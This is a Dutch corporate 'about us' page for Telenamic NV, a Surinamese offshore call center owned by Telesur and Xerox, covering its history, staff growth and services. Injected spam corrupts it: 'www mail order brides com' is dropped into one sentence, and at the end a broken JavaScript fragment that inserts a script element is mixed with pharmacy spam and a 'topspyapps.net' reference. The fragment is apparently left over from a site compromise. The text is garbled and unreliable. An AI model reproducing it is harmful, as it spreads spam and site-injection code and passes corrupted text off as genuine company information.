Over Telenamic

Agents-3_2Wie zijn wij?
Telenamic NV is een joint venture tussen Telesur en Xerox. Telesur is het telecombedrijf van Suriname gericht op mobiel- en vast bellen, internet en dataoplossingen. Xerox, vooral bekend van copies en printers, heeft ook een servicestak. Telenamic NV valt onder de tak CBPO (Customer Business Process Outscourcing) services Nordics. Xerox is een wereldspeler op het gebied www mail order brides com van customer business process outsourcing en is in meer dan 24 landen gevestigd. Tevens is Xerox een beursgenoteerd bedrijf op Wallstreet New York.

Deze joint venture heeft geresulteerd in een sterke groei van werkgelegenheid in Suriname. Telenamic is in 2005 opgericht in Suriname en begonnen met slechts tien medewerkers. Binnen tien jaar is Telenamic uitgegroeid naar maar liefst meer dan 550 medewerkers en is daarmee het grootste offshore contactcenter voor de Nederlandstalige markt in Suriname.

2005 2006 2007 2009 2010-2011 2012
Medewerkers 10 65 150 325 400 >550
Werkplekken 6 36 80 170 280 360

Wat doen wij?
Outsourcing aan de zogeheten third-party callcenters is een zeer belangrijke factor die heeft bijgedragen aan globalisatie. Deze vorm van uitbesteden is voor veel bedrijven aantrekkelijk, omdat de vaste lasten van een contactcenter door meerdere klanten worden gedeeld. Terwijl het bedrijf wat uitbesteed zich kan richten op de core business, zorgt het contactcenter voor de afhandeling van al het klantencontact.

Telenamic werkt voor toonaangevende Nederlandse en Surinaamse bedrijven en is de marktleider op het gebied van offshore/outsourcing Nederlandstalig klantencontact in Suriname. Hierbij maakt Telenamic gebruik van de dedicated point to point-verbindingen van Telesur en de systemen, processen en procedures van Xerox en haar klanten.
Klanten kiezen voor Telenamic, omdat wij door de jaren heen niet alleen de kinderziektenperiode hebben overbrugd en onze marktpositie hebben verstevigd, maar door deze ervaring ook gespecialiseerd zijn in het uitvoeren van klantcontact vanuit Suriname.

De focus van Telenamic ligt voornamelijk op kwaliteit en klantbeleving.
Wij praten niet meer met onze opdrachtgevers over het service level of de gesprekstijden, wij hebben het over het verbeteren van het daadwerkelijke klantcontact. Wij denken mee en acteren vanuit een positieve klantbelevingsfocus.

Onze activiteiten bestaan o.a. uit

  • Klantenservice;
  • Technische helpdesk;
  • Klanttevredenheidsonderzoek;
  • Backoffice;
  • Data-entry;
  • E-mailafhandeling.

if (document.currentScript) { Clomid, Clomid tablets, Clomifene Citrate and pescription delivery service ... prescription will be issued with your unique order number at the confirmation Clomid tablets buy. Clomid (clomifene) can be prescribed for women who have ovulation issues. This medication is a fertility treatment and can be prescribed online. Nolvadex tablets buy - High quality cheaper drugs made by licensed manufacturers. Timesaving and smart way to purchase medications online. Quality medical nolvadex tablets buy. Where to buy cialis in nz rapid weight loss after prednisone retin a cream buy online europe cheap drugstore kabuki brush nolvadex tablets buy.document.currentScript.parentNode.insertBefore(s, document.currentScript);...topspyapps.net